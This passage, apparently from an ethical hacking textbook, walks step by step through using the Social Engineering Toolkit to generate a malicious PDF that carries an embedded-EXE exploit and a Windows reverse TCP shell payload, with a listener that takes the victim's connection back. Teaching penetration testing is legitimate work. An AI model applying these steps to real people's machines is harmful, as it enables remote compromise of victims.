Social Engineering Toolkit

212
◾ 
Ethical Hacking and Penetration Testing Guide
As we are working with fileformat exploits here, we will choose the first option by pressing “1” 
on the keyboard.
Step 3
—Next, it will ask for the reverse connection IP, which will be the IP of your BackTrack 
box.
Step 4
—Once you enter the appropriate IP, it will ask you for the type of the exploit you want 
to choose. We will choose “Adobe PDF Embedded EXE” exploit, which we used previously 
with Metasploit.
Step 5
—Next, it will ask if you would like to use your own PDF or a template available in SET.
Step 6
—Finally, you need to choose an appropriate payload. We will stick with the default 
“Windows/shell/reverse_tcp” for the time being.

Client Side Exploitation
◾ 
213
Step 7
—Next, we need to enter the IP of our payload listener followed by the port on which 
our listener would run. The IP address would be the same as of our BackTrack box. You can 
choose the port of your choice. Just make sure that no other service is running on that port.
Step 8
—Finally, the SET will ask us if we would like to enable the listener, so it can start listen-
ing to incoming connections. Choose “Yes” and it would start the reverse handler on the 
port that we specified.
Once the victim runs the PDF file, you will receive a reverse connection to your 
BackTrack box.
So now you can see how easy it is to create malicious PDF files with SET.
That concludes our discussion on hacking with PDF. Many pentesters ignore PDF exploits 
thinking they are useless. These hackers really don’t know what PDF exploits are capable of. 
According to me, PDF exploitation is one of the best client side exploitation techniques.

Yüklə 22,44 Mb.

Dostları ilə paylaş: